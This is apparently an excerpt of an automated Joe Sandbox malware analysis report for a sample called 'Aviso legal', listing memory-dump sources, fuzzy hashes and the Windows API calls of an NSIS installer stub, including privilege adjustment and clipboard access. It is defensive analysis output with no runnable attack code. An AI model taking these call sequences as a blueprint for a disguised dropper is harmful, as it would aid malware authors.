                                • API String ID:
                                • Opcode ID: 92446f5e99e2993151c308b48764af5836a59693c930a96b741f619125b0aa4d
                                • Instruction ID: 4649e0e88854c4c1984b3d9eb3d0ee1fe58539af835de67b789ddc985fdbae74
                                • Opcode Fuzzy Hash: 92446f5e99e2993151c308b48764af5836a59693c930a96b741f619125b0aa4d
                                • Instruction Fuzzy Hash: 9E216530E10215DBDB09DFA5D85069EBBB2BF89350F20852AE815B7394DB71A846CB50
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8bbb15f44c777ca44e96c8d9ab9994136e5ee899ddf9d2f5167f8df9b7ce8282
                                • Instruction ID: af4652b44b969d86cf854f8a78f826741934f6d699ae2e025a53904bff9d3880
                                • Opcode Fuzzy Hash: 8bbb15f44c777ca44e96c8d9ab9994136e5ee899ddf9d2f5167f8df9b7ce8282
                                • Instruction Fuzzy Hash: 2B21D6B5D012199FCB40CF9AD884BDEFBF4EF48320F25806AE818AB254D3749944CBA0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90f0bf9d272cd1742edc00031ed3185b04750b066b59ad97896df36c33490b9e
                                • Instruction ID: 6c2601ba54d64e2352d4084a81fe3da7f645a4b8a7b28af9d330fe42ea2a292d
                                • Opcode Fuzzy Hash: 90f0bf9d272cd1742edc00031ed3185b04750b066b59ad97896df36c33490b9e
                                • Instruction Fuzzy Hash: D211A135F101289BDB449A68C8146AF7BEAEBC8314B10443AC406F7380EF74DC028B91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7dfd0c5327569f287edc3cd79502b08eb065e798a5b9a811c71224f0e286a2f
                                • Instruction ID: 854465c231592135362a6089eefcfcb25819c1c1e8e55ab531e0fa2dcf18c54b
                                • Opcode Fuzzy Hash: e7dfd0c5327569f287edc3cd79502b08eb065e798a5b9a811c71224f0e286a2f
                                • Instruction Fuzzy Hash: 481156B68003499FDB10CF9AC945BDEBFF8EF48320F108419E514A7250C375A994DFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6da7ee78e93a9bbcf871e2d947b2a777f217dd3585024a050b9c18555c6214fd
                                • Instruction ID: 7ee0498cb5231c7ef0b4c5890c7f684c799e8365dd06ff75fd4debe2bc4fea0f
                                • Opcode Fuzzy Hash: 6da7ee78e93a9bbcf871e2d947b2a777f217dd3585024a050b9c18555c6214fd
                                • Instruction Fuzzy Hash: 5321FFB5D00219AFCB00CF9AD884ADEFFB8FB49220F50812AE518B7740C374A944CBA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd2d5f64989b31248e37ba40bc211bd954823ed3ebbd446f01c9e9eb1d08599c
                                • Instruction ID: 71312abbe8b01262daf4a036922c6f63760baac3dd23e60b1b9d1aeace8142eb
                                • Opcode Fuzzy Hash: dd2d5f64989b31248e37ba40bc211bd954823ed3ebbd446f01c9e9eb1d08599c
                                • Instruction Fuzzy Hash: 831167B68043499FDB10CF9AC944BEEBFF4EF48320F10841AE518A7250D375A954CFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c618da3585c02a0c27ea73ea548ce9be5233c5cf030aabb4013f4f81c130966
                                • Instruction ID: b5353dcb84d01567fe2330aee22546d733d3d1164a05997316b17f95bc641a23
                                • Opcode Fuzzy Hash: 5c618da3585c02a0c27ea73ea548ce9be5233c5cf030aabb4013f4f81c130966
                                • Instruction Fuzzy Hash: 2A01DF35F040111BEB21D66DE81575BA7DADBC8761F20C83BE10AC73A0DA66CC028785
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7027810249c1fb0905a516898ae75387651aebf3721d1f14de0e6d9b8c1bdcad
                                • Instruction ID: d76ba01a5825867523c288dedc246280fc27df5f01c86bc9e4d56d90f326f362
                                • Opcode Fuzzy Hash: 7027810249c1fb0905a516898ae75387651aebf3721d1f14de0e6d9b8c1bdcad
                                • Instruction Fuzzy Hash: A221E0B5D00219AFDB00DF9AD884B9EFBB8FB49210F50852AE518B7240C374A954CBA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e879fbcd6b416654e14195b7b67826b4c8083681dc8975c212a6980143ddc76e
                                • Instruction ID: c2e7a80d8324b5621d66bf18e82983d197bb5eba160fbf6525ab230514601537
                                • Opcode Fuzzy Hash: e879fbcd6b416654e14195b7b67826b4c8083681dc8975c212a6980143ddc76e
                                • Instruction Fuzzy Hash: 7111D631A102048BDB10EFA5CC45B8ABBA6EF88310F94C575D84C5B29AEBB5DD45CBA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8edf28417db6c58633775f3cf16fe4cb884c257cab05464c2a098ac7e9663cdf
                                • Instruction ID: b9ada7f9b6b3fdbd89e0b92441dbd002ca059e5fb223de23575bd414691d4c34
                                • Opcode Fuzzy Hash: 8edf28417db6c58633775f3cf16fe4cb884c257cab05464c2a098ac7e9663cdf
                                • Instruction Fuzzy Hash: 51016832304344AFCF0A9FB88C105AF3FA7EFCA610B04446AEA05E7291DA354C1687A2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1850a30d8a91daee278ee3ff8cc771b18349c78aa1a7cbb880a206505c310941
                                • Instruction ID: 0daa265207641566d0b4f53479ca72173d893b470d3b440b8fa839139c2d3013
                                • Opcode Fuzzy Hash: 1850a30d8a91daee278ee3ff8cc771b18349c78aa1a7cbb880a206505c310941
                                • Instruction Fuzzy Hash: 0F018F36F101285BEB449AA9C8157EF7BEAABC8364F40407AD506E7380EF64DC039BD1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eb3b8819f7e12ab7bbfc9b96dd43cfdefd6f7c668866e5c5e2ca72f508e24aab
                                • Instruction ID: a1b9b6f8c3e1674b62f0258167e03094e4966bcbf0d898212c122d47f7c650d8
                                • Opcode Fuzzy Hash: eb3b8819f7e12ab7bbfc9b96dd43cfdefd6f7c668866e5c5e2ca72f508e24aab
                                • Instruction Fuzzy Hash: 3E018135F040111BEB14D66DD415B1BB7DADBC9761F20C83BE50AC7391EA66DC028795
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab1dc0d4e3e535ba0ff896d160da9ccaec4a6bc624db193715a6024237a063a6
                                • Instruction ID: 3d7ebc8850e2741d4d5839ff1f5841dc30203b26454f7824d1bc3e2c5c4e58a6
                                • Opcode Fuzzy Hash: ab1dc0d4e3e535ba0ff896d160da9ccaec4a6bc624db193715a6024237a063a6
                                • Instruction Fuzzy Hash: 66010239B00104CFD744DB78D998A5DBBB2EF89315B5640A9E806DB3B0DB34AC92CB40
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7da0d942844f14e78002605437be2262b0f73993cba8a0ed4f4bfc8368f293d
                                • Instruction ID: 69f8ecda3dbcddefcdbf5e41c2ed2e90bd40ec91bd3f09ab83e485b538c5f069
                                • Opcode Fuzzy Hash: d7da0d942844f14e78002605437be2262b0f73993cba8a0ed4f4bfc8368f293d
                                • Instruction Fuzzy Hash: 69F04F35B011299FEB10CBA9D840BDEB7F1FF88326F148165E629A73D5C634E915CBA0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8c9fccc70571f0602e5833a00a3d0249166d68983756333c51dcf1d860fdd0e
                                • Instruction ID: f5695876127a47fe102205344eee07096fd8405e7c973bf4bb701d56b0e301b8
                                • Opcode Fuzzy Hash: f8c9fccc70571f0602e5833a00a3d0249166d68983756333c51dcf1d860fdd0e
                                • Instruction Fuzzy Hash: 13F08237700218AFDF059E99DC419AF7BEBEBC8660B00442AF619E3250DA325D21A7A5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 348adfdfd983864687fd078687949afd68a849e076f5c5baf2997435105f24c7
                                • Instruction ID: 13efe920330a1c6b156060810c03b3b018030211cd84464e1f6639ef92e6ed16
                                • Opcode Fuzzy Hash: 348adfdfd983864687fd078687949afd68a849e076f5c5baf2997435105f24c7
                                • Instruction Fuzzy Hash: D1F0A7B5540140AFDB40CBB4DCC8FEBBBADFBC5715B1581DAE0498A407C6349956C3A0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a412f291c74a1cb093d6578cac0672c39fded8a1851d0ec3f4e09dd5eec618b5
                                • Instruction ID: 88203fc9e8f755dfe676bba37d3e4ef3843ffc671f516b5b28317aaeeb06db4f
                                • Opcode Fuzzy Hash: a412f291c74a1cb093d6578cac0672c39fded8a1851d0ec3f4e09dd5eec618b5
                                • Instruction Fuzzy Hash: 5AE06D76E1022A9FD740DFBD9D4069EBBF8AB48654F508831D95AE7301F631CA1087D1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fe1ea5fef77b0f7b6dcfadf4ea648ef345274532ddb543ac8150873fcdd629e
                                • Instruction ID: 9a17aef9c626833ba3f67c5c49c842053bdc04c26112a5133940f73817a0674b
                                • Opcode Fuzzy Hash: 2fe1ea5fef77b0f7b6dcfadf4ea648ef345274532ddb543ac8150873fcdd629e
                                • Instruction Fuzzy Hash: E6E04FB5E102199FDB40DFB99C0069F7BF9EB48650F108876D91AE7200F731CA108BD1
                                APIs
                                • SetErrorMode.KERNEL32(00008001), ref: 00403550
                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                • CharNextW.USER32(00000000,00440000,?,00440000,00000000), ref: 004036D6
                                • GetTempPathW.KERNEL32(00000400,00442800,00000000,?), ref: 00403809
                                • GetWindowsDirectoryW.KERNEL32(00442800,000003FB), ref: 0040381A
                                • lstrcatW.KERNEL32(00442800,\Temp), ref: 00403826
                                • GetTempPathW.KERNEL32(000003FC,00442800,00442800,\Temp), ref: 0040383A
                                • lstrcatW.KERNEL32(00442800,Low), ref: 00403842
                                • SetEnvironmentVariableW.KERNEL32(TEMP,00442800,00442800,Low), ref: 00403853
                                • SetEnvironmentVariableW.KERNEL32(TMP,00442800), ref: 0040385B
                                • DeleteFileW.KERNEL32(00442000), ref: 0040386F
                                • lstrcatW.KERNEL32(00442800,~nsu), ref: 00403956
                                • lstrcatW.KERNEL32(00442800,0040A26C), ref: 00403965
                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNEL32(?,00000000,00403520,00442800,00442800,00442800,00442800,00442800,00403810), ref: 00405AF1
                                • lstrcatW.KERNEL32(00442800,.tmp), ref: 00403970
                                • lstrcmpiW.KERNEL32(00442800,00441800,00442800,.tmp,00442800,~nsu,00440000,00000000,?), ref: 0040397C
                                • SetCurrentDirectoryW.KERNEL32(00442800,00442800), ref: 0040399C
                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                • ExitProcess.KERNEL32 ref: 00403A78
                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403A8C
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                • ExitProcess.KERNEL32 ref: 00403B0C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                • API String ID: 3859024572-3195845224
                                • Opcode ID: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                • Opcode Fuzzy Hash: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                APIs
                                • DeleteFileW.KERNEL32(?,?,75E03420,00442800,00000000), ref: 00405C72
                                • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75E03420,00442800,00000000), ref: 00405CE3
                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75E03420,00442800,00000000), ref: 00405CF3
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: .$.$\*.*
                                • API String ID: 2035342205-3749113046
                                • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: bc4df8e81a0b14d1d477a4514362ce605687270692fda74298e62d60ca7dec09
                                • Instruction ID: 028d895594f26b516b6e28c9bae7941772c95648510da5ab605f38b5f47e1c04
                                • Opcode Fuzzy Hash: bc4df8e81a0b14d1d477a4514362ce605687270692fda74298e62d60ca7dec09
                                • Instruction Fuzzy Hash: 4CC01273B082149BDB01EBFDA945D8E7364DB813783208637E111F50D1D579C5115A29
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                • GetClientRect.USER32(?,?), ref: 00405788
                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                • ShowWindow.USER32(?,?), ref: 0040582B
                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                  • Part of subcall function 004044CE: SendMessageW.USER32(?,?,00000001,004042F9), ref: 004044DC
                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                • CloseHandle.KERNEL32(00000000), ref: 004058B3
                                • ShowWindow.USER32(00000000), ref: 004058D7
                                • ShowWindow.USER32(?,?), ref: 004058DC
                                • ShowWindow.USER32(?), ref: 00405926
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                • CreatePopupMenu.USER32 ref: 0040596B
                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                • EmptyClipboard.USER32 ref: 00405A06
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                • CloseClipboard.USER32 ref: 00405A61
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                • String ID: {
                                • API String ID: 590372296-366298937
                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                • GlobalAlloc.KERNEL32(?,?), ref: 00404F73
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                • SetWindowLongW.USER32(?,?,00405513), ref: 00404FA3
                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404FB7
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404FFD
                                • DeleteObject.GDI32(00000000), ref: 00405000
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                  • Part of subcall function 004044CE: SendMessageW.USER32(?,?,00000001,004042F9), ref: 004044DC
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                • GetWindowLongW.USER32(?,?), ref: 00405144
                                • SetWindowLongW.USER32(?,?,00000000), ref: 00405152
                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
